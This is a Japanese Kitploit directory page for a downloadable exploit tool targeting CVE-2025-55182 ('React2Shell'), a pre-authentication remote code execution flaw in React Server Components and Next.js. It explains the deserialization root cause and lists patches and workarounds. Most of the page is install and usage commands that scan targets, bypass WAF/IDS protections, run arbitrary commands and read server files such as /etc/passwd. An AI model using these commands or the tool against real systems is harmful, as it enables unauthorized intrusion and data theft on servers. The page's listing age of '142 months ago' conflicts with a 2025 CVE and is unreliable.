Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — 認証前のRCEエクスプロイト(CVE-2025-55182、React2Shell)で、React Server Componentsを標的にします。スキャン、OAST検証、WAFバイパス、コマンド実行、ファイル読み取り機能を備えています。 | Kitploit
ツール/GitHubGitHub/sentinelxofficial/cve-2025-55182
偵察脆弱性分析エクスプロイトIDS/IPS回避ウェブアプリケーション悪用WAFバイパスペネトレーションテストペイロード開発
GitHubsentinelxofficial/cve-2025-55182

CVE-2025-55182

認証前のRCEエクスプロイト(CVE-2025-55182、React2Shell)で、React Server Componentsを標的にします。スキャン、OAST検証、WAFバイパス、コマンド実行、ファイル読み取り機能を備えています。

リポジトリを見る
142ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 — React2Shell

プリオーセンテーション(事前認証)によるリモートコード実行 React Server Components (RSC)、Next.js、および関連フレームワークにおいて。

CVE CVSS Type Author


概要

CVE-2025-55182(別名 React2Shell)は、React Server Components (RSC) エコシステムに影響を与える深刻な事前認証 RCE 脆弱性です。認証されていない攻撃者は、単一の巧妙に細工された HTTP POST リクエストで脆弱なサーバーを完全に侵害できます。

技術的分析

根本原因

React Server Components は、React Flight と呼ばれるカスタムワイヤーフォーマットを使用して関数参照とモジュール呼び出しをシリアライズします。脆弱性は、RSC エンドポイントへの着信 POST リクエストを処理するペイロードデコードメカニズムに存在します。

サーバーが React Flight ペイロードを受信すると、適切な検証なしでコンテンツをデシリアライズし、攻撃者が制御する $$typeof フィールドとモジュール参照解決を信頼します。これにより、攻撃者は以下のことが可能になります:

  1. 任意の Node.js 組み込みモジュール(例:child_process、fs、net)を参照する
  2. $F(関数)型マーカーを介して関数呼び出しを連鎖させる
  3. Node.js サーバーランタイム下で任意のコードを実行する

影響を受けるバージョン

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


機能

  • Scan – 脆弱な RSC エンドポイントを検出し、Next.js/React のバージョンを特定します。
  • Verify (OAST) – 外部帯域外 (OOB) ペイロードを送信し、DNS/HTTP コールバックで RCE を確認します。
  • Bypass – 包括的な WAF/IDS 回避: コンテンツタイプの変異、ペイロードエンコーディング、ヘッダースプーフィング、パスバリアント、WAF ペイロード。
  • Execute – ターゲット上で任意のシステムコマンドを実行します (例: id、whoami)。
  • Read – サーバーから任意のファイルを読み取ります (例: /etc/passwd、package.json)。
  • JSON Output – 機械可読な結果を統合用に出力。

インストール

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

使用法

基本スキャン

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

OAST で RCE を確認

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

完全バイパステスト

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

コマンド実行

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

ファイル読み取り

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

プロキシ使用 (例: Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

ファイル構成

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

緩和策

パッチ(推奨)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

一時的な回避策

· サーバー関数 ("use server") を無効にする · WAF ルールで Content-Type: text/x-component をブロック · RSC エンドポイントのネットワークセグメンテーション


参考文献

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


免責事項:認可されたセキュリティテストのみを対象としています。

作者: SentinelX · https://t.me/SentinelXsecurity

root@kitploit:~
ツールをダウンロード
パッケージ脆弱性あり修正済み
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (パッチ参照)パッチ適用リリース